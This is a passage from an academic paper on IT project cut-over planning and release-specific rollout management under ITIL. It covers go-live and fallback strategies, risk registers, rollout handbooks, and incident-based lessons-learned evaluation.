alternative, in case of project delays? Who recommends these dates? What is the reasoning behind them? • A cut-over window usually last for just a few hours. However, some projects require a weekend. Which constraints and risks are associated with the cut-over timeframe? What are the stakeholders’ wishes? Why do they request a shorter or longer timeframe? • Many projects alter existing business processes. These changes should be addressed in form of an AS-IS and TO-BE description. Which processes are newly introduced, altered or deactivated? Departments which are impacted should be identified as well. Who are the key contact persons? Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 12/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 • Some projects alter the organization. If this is the case, what does the new organization look like? A section of the Project Plan should describe and illustrate the old and new organization. It should highlight the targeted changes, as well as how the targeted changes are to be achieved. Are the change constraints related to the timeframe? Projects with significant reorganization focus should employ an organizational change management task force which delivers this information. • Since people tend to change their opinion or might need to be contacted later for this, further discussions on all related references should be logged. • How many people are going to be impacted during and after a potential go-live? The impact can be of a technical, organizational and/or business nature. It is an open secret that many companies do not document their business processes. Major implementation projects therefore require this task to be conducted. The Go-live Strategy needs to focus on the targeted change by comparing the AS-IS with the TO-BE state. It outlines transition options in order to cut-over a project to a productive environment. These transition options also include the technical aspects and system landscape. However, the technical documentation of the AS-IS and TO-BE is usually conducted in a separate document, here called a ‘System Landscape Design’ (SLDe) document. System Landscape Design (SLDe) The creation of an SLDe is commonly the task of a core technology or IT architecture department. For further Cut-over Planning it is obviously essential that this document exists, and that the current as well as the future system landscape is not only presented in a graphical manner but also properly described. Even though some companies have a Configuration Management Database (CMDB) in place, the information available is frequently not newsworthy or lacks information required by the project. The creation of an SLDe is therefore a task which needs to be foreseen in most IT implementation projects. From the cut-over perspective additional questions need to answered, for example: • who are the applications contact persons (such as Business Owner, Administrator, key users etc.)? • Which business process are linked to the AS-IS and TO-BE system landscape? • Which departments currently work with the applications involved? • A list of associated applications • A list of interfaces, their business objective and the technical protocol used. Extension to SLDe Certain go-live approaches require an extension of the SLDe, which is treated here as a separate deliverable in order that it is not forgotten. Extensions are, for example, particular interfaces for data-migration purposes. System landscapes related to the proposed test methodology as well as the go-live simulation and the cut-over test, which are explained further below, are also important extensions of the SLDe. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 13/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 System profile description If a project is initiated in an environment where a CMDB is missing or not sufficiently maintained, then system-profile descriptions need to be created; this is commonly conducted in the form of a survey. Such a survey should be conducted together with the department which already owns the CMDB. It is therefore advisable during the project-planning phase to conduct a brief review on how well the system landscape is documented and to foresee the system-profile descriptions as an evaluation task within the project schedule, since this task can become quite time-consuming. Fallback Strategy The Fallback Strategy should be defined in writing within the same timeframe as the Go-live Strategy. It provides a top-level draft of the potential activities required in order to reinstall the initial state prior to the start of cut-over. The detailed version of this document, here called ‘Fallback Concept’, will be created later and finalized during the test phase. The Fallback Strategy addresses the following questions: • how can the system landscape be rolled back to its state prior to the start of cut-over? Are further scenarios possible? • How long would such a fallback procedure take? • Which criteria or conditions should trigger a fallback? • Which risks are associated with each fallback option provided? What do their mitigation strategies look like? • In case of a fallback, how great is the potential business impact? Can the potential impact be quantified? How great is the impact in case a foreseen fallback scenario fails? How likely is it to occur? How great is the impact in case the system landscape involved is unavailable for one day? How many days can a business survive without IT? • Which model should be used in order to calculate the business impact? • What is the maximum acceptable downtime? How is it calculated? Are Service Level Agreements (SLAs) jeopardized? How great are the potential contractual penalties? • Where can potential PORs be positioned? Where is the PONR? Do all relevant systems have a disaster recovery concept in place, in case the PONR has been reached and things go wrong? Is it possible to assign a potential business impact to each POR identified? What are the termination criteria associated with each POR? The questions provided are obviously not complete, but are intended to illustrate the potential complexity involved. Communication-related deliverables Cut-over Management is communication management, and related deliverables such as a Communication Plan, a stakeholder analysis and a kick-off, to mention just a few, do not differ from ordinary project-management methodologies and are therefore not further elaborated here. However, these methodologies need to be applied within the cut-over context. A warehouseman, for example, is unlikely to be part of an ordinary Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 14/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 project stakeholder analysis. However, within a cut-over context, a warehouseman can be an important key player. By the end of the design phase the Cut-over Team should be defined. The Cut-over Team consists of all people required to contribute to the cut-over deliverables explained within this section. The Cut-over Team also should be completely defined by the end of the design phase. Communication-related deliverables are recommended not to be evaluated during a potential assessment. This is because both a Go-live Strategy and a Fallback Strategy require these communication items to be in place in order to prove that all important stakeholders’ views have been considered. The framework for Cut-over Planning can also been seen as a communication-related deliverable. It is a document which describes how planning for the cut-over is to be conducted, and which cut-over related deliverables are to be produced. Such a document is obviously only advisable for larger cut-over tasks and is therefore not mandatory. Realization phase Decision related to the go-live and Fallback Strategy The decision related to the go-live and Fallback Strategy is a key outcome of the realization phase. It needs to be conducted by the Steering Committee since it relates to the triple constraints, such as scope, timeframe, budget and risk. The decision is required to be prepared in form of a decision-model presentation and commonly extensively discussed, prior to a Steering Committee meeting. It is then up to the members of the Steering Committee to consult or involve further senior management if the go-live risks associated require this. This decision may present several political challenges and if it is conducted too late then the timely delivery of the project is at risk. One-pager The One-Pager summarizes the go-live and Fallback Strategy decided. It is later integrated within the release-specific Rollout Handbook. The objective of the one-pager is to inform all other projects and participating parties about the rollout and to facilitate the preparation of the release-specific rollout. Draft Cut-over Plan The Cut-over Plan and the Cut-over Schedule are not the same and are explained further below, within the context of the Rollout Handbook. The Cut-over Schedule is an important part of the Cut-over Plan. As a minimum requirement a draft Cut-over Schedule should be available at the end of the realization phase, sufficient to support the planning activities for the release-specific rollout. Since the term ‘draft’ can be interpreted in several ways, it is suggested to define the outcome in advance in order to avoid disappointment at the end of the realization phase. This draft schedule should contain all activity blocks, with their subordinated activities as well as their durations, dependencies within these activity blocks, with an attached working breakdown structure (WBS) and a Glossary. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 15/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Risk register The cut-over related Risk Register does not differ much from an ordinary project Risk Register. The administrative work of this Risk Register should be kept to a minimum, since the risks solely relate to the cut-over. However, it is still necessary that such a record is properly administrated. Since key elements of such a Risk Register are quite frequently forgotten, such as the Risk Owner or Risk Indicator, a practical set of parameters are suggested here, such as: • Risk ID: the ID number assigned to the risk • Risk Category: a sorting criterion used to categorise risks. Commonly used categories are, for example, applications or phases during a rollout. • Risk Description: this can follow a simple scheme by addressing three questions: (i) What is the actual risk? (ii) How is the risk caused? (iii) What is the impact if the risk does occur? • Alerter: can be anyone who identifies and reports a risk. • Alerting Date: the date on which a risk has been recorded. • Magnitude: calculated on the basis of the probability and potential impact of a risk occurrence. • Risk Indicator: criteria used to recognize that a risk has manifested itself; for instance, error messages after a database update etc. • Mitigation Measure: a counter-action that can be taken if a risk manifests itself. • Risk Owner: a person with the assigned authority and competency to mitigate a risk. The Risk Owner identifies mitigation strategies, defines Risk Indicators and nominates a Technical Contact for the respective rollout. This role also includes refining the Risk Description, since the risk as such is frequently confused with the causes of a risk. • Technical Contact: a technical expert or a team which shares the required technical expertise and is in any case present during the rollout, usually fulfils this role. This person is responsible during the rollout (i) to verify whether a risk has manifested itself, and (ii) to coordinate Mitigation Measures defined within the Risk Register. • Processing Status: describes how far the processing of the risk has progressed. • New: a new risk has been recorded, described and assigned to an initial Risk Owner; • Under Way: the Risk owner has accepted his role for the particular risk raised, and communicates a delivery date on which the Mitigation Measures and Risk Indicator are defined; • Completed: as soon as the Mitigation Measures and Risk Indicator are described and a Technical Contact for the particular risk has been nominated, Risk Processing has been completed. • Completion Date: the date on which processing status is set to ‘Completed’. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 16/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 5 Dependency Matrix. Illustration of a Dependency Matrix, which is used as a tool for the evaluation of the (potential) impact and interrelations between Project Teams and Core Teams; each bold point symbolizes an interaction between a Project Team and a Core Team; the sum of interactions is a criterion for the complexity of a project as well as a release. Dependency matrix A collective participation by projects in a release-specific rollout causes a need to manage dependencies. These dependencies can occur between Project Teams as well as jointly used personnel resources, here called ‘Core Teams’. The Dependency Matrix is a tool used to evaluate the potential impact and interrelation between Project Teams and Core Teams. Project Leads are requested to fill out a template and to identify which key personnel are required to be present during the cut-over. The Dependency Matrix is hard to define as a tool because the terms (i) ‘Core Team’ as well as (ii) ‘dependency’ are themselves difficult to define. Here, a Core Team is seen as a heterogeneous group of key personnel required to be present during a cut-over/rollout. It consists, for example, of administrative personnel related to key applications and databases as well as Service Owners (within an ITIL context). A dependency between a Project Team and a Core Team is present if communication between the Project Team and the Core Team or its related technology is necessary during cut-over/rollout. Since Project Teams usually identify similar Core Teams, a template can be created. This is illustrated in Fig. 5. The bold points visualize dependencies between Project Teams and Core Teams participating in a release. Even though the term ‘Core Team’ is treated less strictly, these dependencies can be facilitated to quantify the complexity of a release. Complex projects usually require more key personnel than less complex projects. A complex release usually consists of several projects with many dependencies. Therefore, one possible measurement of the complexity of a release is the total amount of dependencies. This idea is further elaborated below. Additionally, such a Dependency Matrix is quite a sensible instrument to have in order to Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 17/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 identify projects which have probably influenced a particular business process negatively after rollout. Dialogue with Rollout Management Projects are requested to pass a gate prior entering the release phase, which consists of a variety of project deliverables. Most of the cut-over related deliverables have already presented here, such as (i) the decision related to the Go-live Strategy, (ii) the Cut-over Plan (draft), (iii) a Risk Register, (iv) Dependency Matrix and (v) an obligatory dialogue with Rollout Management. The cut-over related deliverables are discussed during the dialogue along with a couple of questions which the Rollout Manager is to address. Test phase During the test phase the Cut-over Plan and Fallback Concept need to be finalized. The disaster recovery concept relates to the period after the Point-Of-No-Return (PONR) and is required to be produced for new systems or potentially extended for existing systems. It has already been mentioned that an insufficiently documented system landscape can severely affect a project’s progress. It should therefore already been evaluated during the Project Planning phase whether sufficiently documented disaster recovery concepts are in place for existing systems. After completing the integration tests, a cut-over test and ago-live simulation should be conducted. The cut-over test is usually the last test prior to the rollout with the objective of validating the Cut-over Schedule. Some steps are simply conducted in an exemplary fashion, such as data migration. This is in particular valid if a huge amount of data is required to be migrated. A cut-over test would also cover a couple of fallback scenarios and (if necessary) a disaster recovery case as well. A second form of validation is what this paper refers to as the ‘go-live simulation’, which has more similarities to a rehearsal than a test. The go-live simulation focuses on the communication requirements during a cut-over and necessary delivery points. It should be conducted with the whole Cut-over Team (personnel involved in the cut-over) in place under circumstances which are close to the real cut-over situation. For this reason the plan for the deployment of personnel should be in place as well. Both the cut-over test as well as the go-live simulation can be conducted solely for a particular project and/or together with other projects as part of a release. The scope of both validation forms needs to be defined as part of the decision related to the Go-live Strategy during the realization phase. The effort required to conduct these tests is quite significant, since IT landscapes close to the live environment are required. Cut-over and support phase During the cut-over phase the operative cut-over is to be conducted either with other projects in form of a release, or by one project alone. In the latter case, the project does not participate in a release and conducts a project-specific cut-over independently. Such an independent cut-over is most likely conducted in large-scale projects. ITIL recommends a support phase as part of the release and deployment process (Rance, 2011). However, support can only be provided by the personnel who have supporting Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 18/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 knowledge, that is, knowledge which can be provided exclusively by the Project Teams and not by the personnel owning the release and deployment process. It is therefore argued that after the end of the Rollout Window, the subsequent support phase is required to be covered by the Project Teams. It is advisable to incorporate a specific period for the observation of incidents after cut-over or rollout prior to the Lessons-learned Workshop. This observational period lasts from 1 to 4 weeks and obviously depends on the complexity of the project or release. This aspect is further developed below, together with recommendations on how to run a Lessons-learned Workshop. RECOMMENDED DELIVERABLES AND OUTCOMES FOR THE PREPARATION OF A RELEASE-SPECIFIC ROLLOUT This chapter highlights a couple of important deliverables and outcomes of the release-specific Rollout Management. Large-scale projects which are likely to cut-over independently may consider the outcomes described here as well, even though these are assigned to the release phase. The Rollout Handbook The planning document and key deliverable for the release-specific rollout is the Rollout Handbook. This may be compared with the Project Plan defined in the PMBOK R⃝. However, it relates solely to the release-specific rollout. The PMBOK R⃝ (PMI, 2001) defines a Project Plan as a “. . . formal, approved document used to guide both project execution and project control. The primary uses of the Project Plan are to document planning assumptions and decisions, facilitate communication among stakeholders, and document approved scope, cost and schedule baselines. A Project Plan may be summarized or detailed.” Even though the Rollout Handbook is structured to the same degree as a Project Plan, it is only finalised shortly prior to the actual rollout. A classic Project Plan, however, needs to be completed at the beginning of the project, during the planning phase. The Rollout Handbook consists of the following items: Executive Summary: describes the major rollout activities, participating projects and applications, highlights major risks and provides an overview chart of the Rollout Windows. Version History: the Rollout Handbook is to be extended and adjusted throughout the whole release phase. It is therefore important to publish temporary versions of this book in regular iterations, so that it can be reviewed. A Version History is therefore crucial in order to keep track of these changes. Communication Plan: lists all participating persons with their contact details. Communi- cation related to the rollout is part of the Rollout Schedule and describes who needs to be contacted when and with what information. The Communication Plan also includes the plan for the deployment of personnel in all participating Project Teams and Core Teams. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 19/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Risk Register: aggregates the Risk Logs of all participating projects into a simple Excel format. The format of the Risk Log is equal to the one described above. Description of Rollout Window: is usually accompanied by a visual presentation and summarizes major activities such a data migration or deployments on specific systems. An important item of this description is a table including all participating projects, their associated deployment times and points-of-use. One-Pager of all participating projects: defines the scope of the rollout. Schedule Management: a Rollout Schedule is quite similar to an ordinary project schedule; however, some distinct differences exist. IT-implementation projects usually have a timeframe of several months and are referred to ordinary projects in this paper. The release-specific rollout only lasts for a couple of hours. Ordinary project schedules are usually managed with duration-based or effort-based methods. A rollout can only be scheduled by duration-based approaches, since the duration of most activities is fixed. Here, the duration of tasks is usually scheduled on an hourly/minute basis. Rollout Schedules need to have activity IDs and not only row numbers. What is the difference? Scheduling is commonly conducted with planning tools which facilitate row numbers. The planning tools use these line numbers for various calculations. However, they are also likely to be changed quite frequently if the plan is changed. In order to avoid communication issues, particularly during the operative rollout, alphanumerical IDs should additionally be used. It is recommended to assign activity types to activities, see also Table 2. Why? Firstly, Rollout Schedules are very likely to be reused. This reusability is obviously much easier if unique activities, those that are just used once for a particular rollout, are sufficiently labelled. Additionally, a Rollout Plan is much easier to read if the operator knows already in advance, for example from the use of particular colours, what types of activities are expected, such as communication activities or checkpoints. Communication during release planning Preparation work related to the release-specific rollout mainly covers coordination meetings with Project Teams and associated Core Teams participating in the release. Additionally, a large number of staff is required to be informed about the status related to the rollout preparation within the company. A rollout newsletter is a fit-for-purpose communication tool which can be easily customized to cover the coordination aspect and meet the corporate information need. The release model illustrated here is used in such a manner that 6 rollouts are conducted on an annual basis, which results in an approximately 8-week preparation cycle for every rollout. A typical schedule related to the planning activities and publication dates of such a release cycle is illustrated in Fig. 6. The newsletter is published about every other week. It comprises topics related to the rollout preparation work, as well as subjects related to general IT questions such as new documents and procedures published by the security personnel, changes conducted by the Change Management etc. The newsletter is 2–6 pages long and announces deadlines and important dates, such as the date for the approval of Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 20/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 6 Planning activities of the release. Schedule of planning activities of the release, associated with the publication time of rollout newsletter. the Rollout Handbook, which is done during a meeting with all key personnel. Documents related to the newsletter, such as the Rollout Handbook, are stored on MS SharePoint R⃝. This provides the desirable function of enabling distribution of the newsletter to a wider community and limiting access to more confidential documentation. The 4th edition is published a couple of days prior to rollout. By this stage the Rollout Handbook is in a final stage and everybody involved has a last chance to incorporate necessary changes. The newsletter publishes the major steps involved during the rollout, key contact phone numbers and an overview illustration. All interested parties thus know the overall picture of the rollout, whereas access to the Rollout Handbook is restricted. The 4th edition publishes all major planning steps and dates for the preparation work of the following rollout as well. The 1st edition focuses on the incidents after the rollout. Incidents are observed up to 2 weeks after the rollout. The observation period closes with a Lessons-learned Workshop, the submission of the final report and the closure of the Rollout Change (see further below for the treatment of the Rollout Change). The 2nd and 3rd editions provide temporary planning results and draft versions of the Rollout Handbook. Planning is conducted in three phases: during the 1st phase, interviews are conducted between Rollout Management and Project Teams, see Table 1 for the deliverable ‘Dialogue with Rollout Management’. During the 2nd phase, Rollout Management interviews the Core Teams, and throughout the 3rd phase fine tuning of the Rollout Handbook is carried out. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 21/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Rollout change There is no universal measure on how to organize changes. Obviously, IT-service organizations need to record changes related to their system landscape; however, the way these are recorded, the level of detail and types of changes used differ significantly between organizations. What is a Rollout Change? The Rollout Change relates to the changes caused by the release-specific rollout. However, it only covers the release-specific Rollout Window. It has already been highlighted above that a project can cause damage in potentially two ways: firstly during the software deployment and secondly at the point-of-use. If the point-of-use falls outside the Rollout Window then it is not covered by the Rollout Change. In this case an additional change is required to be recorded. For this reason the Rollout Handbook contains a register which lists the deployment window and point-of-use for every project. The Rollout Handbook is appended to the Rollout Change as well. The Rollout Change is created at the beginning of the release phase and then iteratively extended by updating the attached Rollout Handbook. Once this Handbook has been approved or is present in its final format, the change is requested to be approved by the Change Advisory Board (CAB). The Change is closed after the completion of the Lessons-learned Workshop, described in the next section. Lessons-learned workshop Above it has already been explained that a Lessons-learned Workshop should be conducted after completion of the rollout. Lessons-learned Workshops provide many generic benefits, such as: • the reuse of knowledge throughout an organization • the reduction of project cost • the improvement of methods and practices, and • the enhancement of project delivery and quality management just to mention a few of them. However, the Lessons-learned Workshop mentioned here relates solely to the rollout conducted and is not of generic nature. Let us step back a little to add some higher-level perspective. Any IT organization has a need to improve its processes, ensure agreed service levels and justify its projects or initiatives. For this reason, Continuous Service Improvement (CSI) represents one of ITIL’s five process groups. The CSI Register, which lists all improvement options and initiatives, is one of an IT organization’s key deliverables (Cabinet Office, 2011). Key Performance Indicators (KPIs) are used to measure the process. How can we measure the success of a rollout? What do we mean by success? ITIL publications already suggest a variety of KPIs, such as the number of incidents caused after the release-specific rollout. These simple KPIs can, when implemented in practice, be quite tricky. Even though this particular KPI is suggested for the service validation and test process within ITIL’s service transition process group (Rance, 2011), incidents are always a good indication of disturbances and are here also used for the evaluation of the rollout’s success. Figure 7 illustrates the total number of incidents recorded within one IT Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 22/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 7 Illustration of incidents during a two-year period. Dotted lines illustrate week of rollout with release names; data relate to the total number of incidents recorded. Actual incident numbers are disclosed due to confidentiality reasons. service organization. The dotted lines indicate the week during which a rollout occurred. The sharp decline of incidents during CW 30 is because a service-request process was introduced. The dips between 200 and 500 incidents/week are caused by the Christmas season, where many people are on holiday. Otherwise, it is quite difficult to acknowledge any impact of the rollout on the total number of incidents recorded. The picture changes once we take a closer look at a particular system. Figure 8 illustrates second-level incidents for a main order-handling system, which participated in all rollouts. These incidents account for about 5% of the total number of incidents recorded. After some rollouts a rise of incidents can be observed. How should we measure this? Figure 9 shows the variability of incidents four weeks before and after rollout. The connecting lines are to aid visualisation of the form of the curves and are not intended to suggest data points at all. The data provided are normalized. Here, the mean value of incidents during a period of four weeks before rollout is set to 100%, with a standard deviation of ±18%. The figure suggests a significant increase of incidents 1–2 weeks after rollout. This increase is summarized in Fig. 10, where the average increase in incidents two weeks after rollout is plotted. Most rollouts show a significant increase. The negative value occurred during the summer holiday period time, when less people recorded and reported incidents. The values provided have been incorporated for illustrative purposes. It is hardly surprising that if the number of projects participating in a rollout increases, then the number of incidents increases as well. Figure 11 shows a correlation coefficient of 0.4 between the average increase of incidents two weeks after rollout and the number of participating projects per release. If we consider the complexity of a rollout as introduced above, see also Fig. 5, which is the total number of interactions between Project Teams and Core Teams participating in a rollout, then we obtain a similar correlation coefficient of Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 23/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 8 Second-level incidents of a main order-handling system. Illustration of incidents during a two-year period. Dotted lines illustrate week of rollout with release names; data relate to second-level incidents of a main order-handling system, which participates in all rollouts. Figure 9 Variability of incidents four weeks before and after rollout. Connecting lines visualize the form of the curves; the mean value of incidents during a period of four weeks before rollout is set to 100%, with a standard deviation of ±18%. 0.36, see Fig. 12. The high level of incidents provides a good primary source of information on how well the rollout and release performed. However, these data should only be used indicatively and need to be interpreted carefully, as: • processes or the ways processes are managed change over time, such as the above- mentioned introduction of a service-request process, which reduced the number of incidents Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 24/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 10 Average increase of incidents two weeks after rollout. Standard deviation is ±18% as illustrated in Fig. 9; names label the rollouts, which are plotted on a timeline in Fig. 8. Figure 11 Correlation coefficient A. Correlation coefficient of 0.4 between the average increase in incidents two weeks after rollout and the number of participating projects per release. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 25/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 12 Correlation coefficient B. Correlation coefficient of 0.36 between average increase of incidents two weeks after rollout and the complexity per rollout. • some projects separate their cut-over and point-of-use. Incidents can, for example, pop up two or three weeks after rollout once the software goes live • the number of incidents recorded is impacted by seasonal variability, such as holiday periods and Christmas • changes are conducted after and prior to rollout, and can significantly influence the statistics. In order to learn what actually caused these incidents they need to be examined in a more detailed manner, which is the purpose of the Lessons-learned Workshop recommended here. The Lessons-learned Workshop should be attended by all key personnel involved, such as the Project Manager/Cut-over Manager of the participating projects, Test Manager, and staff involved in the resolution of 2nd and 3rd level incidents—just to mention some of them. In order to run such a workshop it is essential to identify the incidents/service requests most frequently caused by the rollout and to classify them. These incident categories are used solely for rollout-evaluation purposes and additionally to the ordinary classification scheme, which is part of the incident-management process. Table 3 provides an example of typical incident categories used after rollout evaluation. Between 60 and 80% of the incidents evaluated have usually not been detected by the test. Incidents caused due to bad Rollout Schedule or descriptions are rare. This suggests that the evaluation of incidents as such is more a measure of the test quality than of the Rollout Planning and execution performance. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 26/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Table 3 Incident categories used solely for rollout evaluation. This classification scheme isused in addition to the schema already facilitated by the incident management process, which is not further described here. Incident category Description Error within release/ not detected through testing Incident was caused by a software error which was not detected in testing. This category is also used for service requests, which fix release-specific errors, e.g., in the form of patches. Human failure This category is used for incidents caused by human failure, such as faulty execution of patches or noncompliance with agreements. Incident caused by project Incident is related to a project; this category makes particular sense if a significant number of incidents are related to a particular project. Rollout Schedule requires change Activity required to be conducted was not properly described. If it is a reoccurring activity then the description needs to change. Expected behaviour Irregularities recorded are considered to be an accepted and expected behaviour of the system or application. Sequential error within the Rollout Schedule (application-specific) Incident is caused by a sequential error within the Rollout Schedule; activity was requested to be conducted by an application which regularly participates during the rollout. Sequential error within the Rollout Schedule (project-specific) Incident is caused by a sequential error within the Rollout Schedule; the activity was requested to be conducted by a Project Team. Bugfix This category relates to incident-response measures which occur prior to the rollout and which aim to eliminate software error. It is merely a convention to relate them to the Rollout Change, which also fixes these errors. Missing contact person The contact person who logged this change could not be contacted. The number of incidents assigned to this category should be kept small. Incident is not reproducible The incident cannot be reproduced. Wrongly connected Incident was not related to the Rollout Change and was wrongly related. Not classifiable Incident cannot be classified with available classification; the classification is of course extended with additional categories where required. One of the challenges these workshops face is related to the proper assignment of incidents to the Rollout Change. The application-specific increase of 2nd level incidents after rollout provides a good indication of the expected number of incidents required for analysis. The second KPI introduced is specifically designed to measure the planning and execution performance of a rollout. Here, the scheduled time is compared with the actual execution time. The measurement can easily be conducted by the inclusion of communication items within the Rollout Schedule, such as e-mails. These e-mails are sent by the rollout personnel shortly prior to execution of critical items, here called ‘measurement points’. The time stamps of these e-mails provide a measure of the actual execution time. Figure 13 illustrates the discrepancy between the scheduled time (open circles) and actual execution time (closed circles). If the closed circles are below the open ones then the actual rollout was executed quicker than foreseen. If vice versa, a delay occurred. Figure 13 illustrates that the activity related to measurement point 2 finished sooner than foreseen. The activity related to measurement point 3, however, was delayed. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 27/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 13 Discrepancy between the scheduled time and actually executed time. Illustration of the discrepancy between the scheduled time and actually executed time for nine measurement points. Such a diagram provides a good basis for a structured discussion on why certain rollout activities started later or finished earlier. CONCLUSIONS Within this publication a deployment framework is presented which illustrates how good ITIL management practices can be aligned with a project-management model in order to assure timely delivery of what this paper refers to as ‘project-specific cut-over’. This alignment is shown by the use of a semi-agile release model. Due to the release model selected, which is particularly characterized by its bundling of projects for what is here referred to as ‘release-specific rollout’, a new definition and interpretation of ITIL’s generic view of deployment is required. The facilitated release model additionally required two types of go-live scenarios: one for each participating project and one for each release. In order to finalize a project-specific cut-over punctually, a variety of cut-over related deliverables are presented and chronologically assigned to a typical IT project managed in a Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 28/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 cascading manner. Projects already need to take into account cut-over related deliverables during the initial planning phase. It is also shown how project-specific outcomes interrelate with release-specific planning activities and are finally aggregated within the Rollout Handbook and proposed as Rollout Change for approval by the CAB. Emphasis is placed on the Lessons-learned Workshop recommended to be conducted a couple of weeks after the rollout, once the level of incidents has normalised. This Workshop should be guided by the rollout/cut-over related incidents, and a comparison of the scheduled time and actual execution time of the rollout should be included in the Workshop. Even though consulting methodologies such as ASAP (Accelerated SAP) recommend scattered, project-specific deliverables useful for Cut-over Planning, this publication offers an integrated approach on how to systematically prepare for a project-specific cut-over with all required deliverables. The framework provided extends the ITIL release and deployment process by means of IT projects and allows IT projects to interface easily with the ITIL change-management process. The framework has proven to be successful since it forces projects to think already during the planning phase about cut-over related topics. After implementation of this framework we see projects better prepared prior entering the release. However, we also do have projects which wish to cut-over by the use of their own methodology. Probably this formal approach is not everybody’s cup of tea. ACKNOWLEDGEMENTS I would especially like to thank Andreas Veldmann for the constantly inspiring discussions and his substantial help in the implementation of this framework. Thanks are also due to Necla Demirci, Gerd Heyken and Joachim Kunze for many stimulating discussions on this paper and related work. I am particularly grateful to Sebastian Evert, Dr Sebastian Diedrich and Enrico Voigt for providing incident-related data from Cherwell’s IT Service Management Software. I am very grateful to Jim Blake at World2World Hamburg for editing the English version of this paper. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research related to the implementation of the framework described in this paper has been made possible by the Department of Test and Release Management of Otto (GmbH & Co KG) which is a member of the otto group. The framework presented here in the form of an illustrative case study arose during my consultancy work and has been implemented for some applications within the Department of Testing and Release Management at the Otto (GmbH & Co KG). Grant Disclosures The following grant information was disclosed by the author: Department of Test and Release Management of Otto (GmbH & Co KG). Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 29/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Competing Interests Dr. Guido Nageldinger is an employee of Otto (GmbH & Co KG) which is a member of the otto group. Author Contributions • Guido Nageldinger conceived and designed the experiments, performed the experi- ments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.29#supplemental-information. REFERENCES AXELOS. 2011. ITIL R⃝ Glossary of Terms English v. 1.0’ published by © AXELOS Limited. Available at https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL 2011 Glossary GB-v1-0.pdf (accessed 9 June 2015). BSI. 2008. BSI-Standard 100-4: Notfallmanagement (Emergency Management) Version 1.0, German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnologie). Available at https://www.bsi.bund.de/cae/servlet/contentblob/471456/ publicationFile/30746/standard 1004.pdf (accessed 9 June 2015). Cabinet Office. 2011. ITIL continual service improvement 2011 edition (best management practices). The Stationery Office (July 29, 2011), page 36, page 197–199. Jäntti M, Virkanen H, Mykkänen J, Hotti V. 2014. Exploring the role of IT service management and it service Governance within IT Governance. In: Service Systems and Service management (ICSSM), 2014 11th international conference on, IEEE conference publications. 1–6 DOI 10.1109/ICSSSM.2014.6874122. Jokela K, Jäntti M. 2012. Challenges and problems in product portfolio release and deployment management: a case study. In: Service systems and service management (ICSSM), 2012 9th international conference on, IEEE conference publications. 138–141 DOI 10.1109/ICSSSM.2012.6252208. Lahtela A, Jaentti M. 2011. Challenges and problems in release management process: a case study. In: Software Engineering and Servcie Science (ICSESS) 2011 IEEE, 2nd international conference on, IEEE conference publications. 10–13 DOI 10.1109/ICSESS.2011.5982242. Larsson F, Rusu L, Aasi P. 2015. Organizational structure in IT Governance: a case study of an IT Governance implementation project. In: AMCIS 2015 proceedings 06/2015, 21st Americas conference on information systems. Puerto Rico, Available at http://aisel.aisnet.org/amcis2015/ SocTech/GeneralPresentations/16/ (accessed 30 September 2015). Marrone M, Gacenga F, Cater-Steel A, Kolbe L. 2014. IT service management: a cross-national study of ITIL adoption. In: Communications of the association for information systems, vol. 34. 866–892, Article 49. Available at http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772& context=cais (accessed 30 September 2015). Nageldinger G. 2014. Project-specific cut-over and release-specific rollout: what is the difference and what should we look out for (Projekt-spezifischer Cut-over und Release-spezifischer Rollout: Was ist der Unterschied? Worauf müssen wir 